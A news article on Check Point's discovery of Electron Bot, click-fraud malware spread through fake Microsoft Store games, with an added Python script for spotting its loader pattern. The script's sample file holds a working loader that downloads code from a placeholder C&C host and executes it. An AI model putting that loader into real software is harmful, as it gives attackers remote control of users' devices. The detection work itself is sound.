Monday, February 6

New malware capable of taking over social network accounts detected



Check Point Research (CPR), the Threat Intelligence division of Check Point® Software Technologies Ltd. (NASDAQ: CHKP), a leading provider of global cybersecurity solutions, has detected new malware, dubbed Electron Bot, that is being actively distributed through the official Microsoft Store.

With more than 5,000 computers already affected, the malware continually executes the cybercriminals' commands, such as taking over social media accounts on Facebook, Google and SoundCloud. In this way, the operators are able to register new accounts, log in, leave comments and like other posts.

Electron Bot is modular SEO-poisoning malware used for social media promotion and click fraud. It is mainly distributed through the Microsoft Store platform via dozens of infected applications, mostly video games, which the cybercriminals upload continuously. The attackers' activity began as an ad-clicker campaign discovered in late 2018, when the malware was hiding in the Microsoft Store as an app called “Album by Google Photos” that claimed to be published by Google LLC. It has since evolved steadily, adding new features and techniques to its arsenal.

The bot is built with Electron, a framework for creating cross-platform desktop applications using web technologies. The framework combines the Chromium rendering engine with the Node.js runtime, so an Electron application has the capabilities of a full browser driven by JavaScript, plus the file-system, network and process access that Node.js provides.

To avoid detection, most of the bot's control scripts are loaded dynamically at runtime from the cybercriminals' servers. This lets the attackers modify the payload and change the bots' behavior at any time. Electron Bot mimics human browsing behavior and evades website protections.


The main capabilities of Electron Bot are:

  1. SEO poisoning, an attack method in which cybercriminals create malicious websites and use search engine optimization tactics to make them appear prominently in search results. The operators also sell this as a service to promote the ranking of other websites.
  2. Ad clicking, an infection that runs in the background and constantly connects to remote web pages to generate “clicks” on advertisements, earning money for each time an ad is clicked.
  3. Promoting social media accounts, such as YouTube and SoundCloud, to drive traffic to specific content and increase visits and ad clicks to generate profits.
  4. Promoting products online to generate revenue from ad clicks, or inflating a store's rating in order to increase sales.

Also, because the Electron Bot payload is loaded dynamically, attackers can use the installed malware as a backdoor to gain full control of the victim's device.

Distribution through video game applications in the Microsoft Store

There are dozens of infected apps in the Microsoft Store. Apps using popular titles such as “Temple Run” or “Subway Surfer” have been found to be malicious.

So far, the researchers have counted 5,000 victims in 20 countries. Most of the victims are in Sweden, Bermuda, Israel and Spain. In addition, they have identified several malicious video game publishers whose entire catalogs are part of the campaign:

  • Lupy games
  • crazy 4 games
  • Jeuxjeuxkeux games
  • Akshi games
  • Goo Games
  • Bizon case

How the malware works

  1. The attack begins when the victim installs an app from the Microsoft Store that poses as a legitimate game.
  2. After installation, the app downloads files from the attackers' server and executes scripts.
  3. The downloaded malware gains persistence on the victim's computer and repeatedly executes the commands sent from the attackers' C&C server.
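As an added example (not Check Point's analysis code and not anything taken from the Electron Bot samples), the following Python triage script looks for the runtime-loader pattern described in the framework section above and in steps 2 and 3 here: JavaScript that fetches a script over the network and hands it to a code-execution API, together with BrowserWindow settings that disable Electron's renderer isolation. The API patterns, the scoring and the two sample source files are my own constructions, not indicators from the report.

```python
"""Heuristic triage of an Electron app's JavaScript for the fetch-then-execute
loader pattern. Added example for this article; not Check Point's or Electron
Bot's code. Patterns, scoring and sample sources are assumptions, not IOCs.
"""
import os
import re
from dataclasses import dataclass, field

# Sinks: APIs that turn a string into executable code or launch a process.
CODE_SINKS = [
    (r"\beval\s*\(", "eval()"),
    (r"\bnew\s+Function\s*\(", "new Function()"),
    (r"\bvm\.runIn(?:This|New)?Context\s*\(", "vm.runIn*Context()"),
    (r"\bnew\s+vm\.Script\s*\(", "new vm.Script()"),
    (r"\.executeJavaScript\s*\(", "webContents.executeJavaScript()"),
    (r"\b(?:exec|execSync|spawn|spawnSync)\s*\(", "child_process exec/spawn"),
]
# Sources: APIs that pull data from the network at runtime.
REMOTE_SOURCES = [
    (r"\bfetch\s*\(", "fetch()"),
    (r"\bhttps?\.(?:get|request)\s*\(", "http(s).get/request()"),
    (r"\bnew\s+XMLHttpRequest\b", "XMLHttpRequest"),
    (r"\baxios\.(?:get|post)\s*\(", "axios"),
]
# BrowserWindow webPreferences that remove Electron's renderer isolation.
RISKY_PREFS = [
    (r"\bnodeIntegration\s*:\s*true\b", "nodeIntegration: true"),
    (r"\bcontextIsolation\s*:\s*false\b", "contextIsolation: false"),
    (r"\bwebSecurity\s*:\s*false\b", "webSecurity: false"),
    (r"\bsandbox\s*:\s*false\b", "sandbox: false"),
]
URL_RE = re.compile(r"""https?://[^\s'"`)]+""")


@dataclass
class Finding:
    path: str
    sinks: list = field(default_factory=list)
    sources: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    risky_prefs: list = field(default_factory=list)

    @property
    def remote_loader(self) -> bool:
        # The loader pattern: network input feeding a code sink in the same file.
        return bool(self.sinks) and bool(self.sources or self.urls)

    @property
    def score(self) -> int:
        base = 10 if self.remote_loader else 0
        return base + len(self.sinks) + len(self.sources) + len(self.risky_prefs)


def _matches(patterns, text):
    return [label for pat, label in patterns if re.search(pat, text)]


def scan_source(path: str, text: str) -> Finding:
    """Scan one JavaScript source file and report what it contains."""
    return Finding(
        path=path,
        sinks=_matches(CODE_SINKS, text),
        sources=_matches(REMOTE_SOURCES, text),
        urls=sorted(set(URL_RE.findall(text))),
        risky_prefs=_matches(RISKY_PREFS, text),
    )


def triage(files: dict) -> list:
    """files: {relative path: JavaScript source}. Highest-risk findings first."""
    findings = [scan_source(p, t) for p, t in files.items()]
    return sorted(findings, key=lambda f: (-f.score, f.path))


def load_js_tree(root: str) -> dict:
    """Read every .js file under an extracted app.asar directory."""
    out = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".js"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    out[os.path.relpath(full, root)] = fh.read()
    return out


# Constructed sample sources (not real Electron Bot code): one file uses the
# fetch-then-execute pattern, the other is an ordinary game script.
SAMPLE_FILES = {
    "main.js": """
const { app, BrowserWindow } = require('electron');
const https = require('https');
const vm = require('vm');
function loadPayload(url, cb) {
  https.get(url, res => { let body = ''; res.on('data', d => body += d); res.on('end', () => cb(body)); });
}
app.whenReady().then(() => {
  new BrowserWindow({ webPreferences: { nodeIntegration: true, contextIsolation: false } });
  loadPayload('https://c2.example.invalid/init.js', code => vm.runInThisContext(code));
});
""",
    "game/engine.js": """
const canvas = document.getElementById('stage');
function tick(t) { canvas.getContext('2d').clearRect(0, 0, 640, 480); requestAnimationFrame(tick); }
requestAnimationFrame(tick);
""",
}

if __name__ == "__main__":
    for f in triage(SAMPLE_FILES):
        tag = "REMOTE LOADER" if f.remote_loader else "ok"
        print(f"{f.path:16} score={f.score:2} {tag} sinks={f.sinks} sources={f.sources} "
              f"urls={f.urls} prefs={f.risky_prefs}")
```

Run it against the files of an extracted app bundle (`npx asar extract app.asar out/`, then `triage(load_js_tree("out/"))`). A hit is a starting point, not a verdict: legitimate auto-updaters also fetch code at runtime, so the finding tells you which file to read and which network endpoint to look at, not that the app is malicious.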

As for the origin of this campaign, there is evidence that it started in Bulgaria, including:

  • All variants between 2019 and 2022 were uploaded to the public cloud storage service mediafire.com from Bulgaria.
  • The SoundCloud account and the YouTube channel that the bot promotes are under the name of “Ivaylo Yordanov”, a popular Bulgarian soccer player.
  • Bulgaria is the most promoted country in the source code.

Researchers at Check Point Research have informed Microsoft of all detected video game publishers associated with this campaign.

“This investigation has analyzed a new malware called Electron-Bot that has attacked more than 5,000 victims worldwide. Electron-Bot is easily downloaded and spread from the official Microsoft Store platform. The Electron framework provides Electron applications with access to all computing resources, including GPU computing. Since the bot’s payload is dynamically loaded at each runtime, attackers can modify the code and change the bot’s behavior at high risk. For example, they can initiate another second stage and deliver new malware such as ransomware or a RAT. All this can happen without the knowledge of the victim. Most people think that app store reviews can be trusted, and don’t hesitate to download an app from there. This carries incredible risk, as you never know what malicious items you may be downloading,” warns Eusebio Nieva, technical director of Check Point Software for Spain and Portugal.

diarioti.com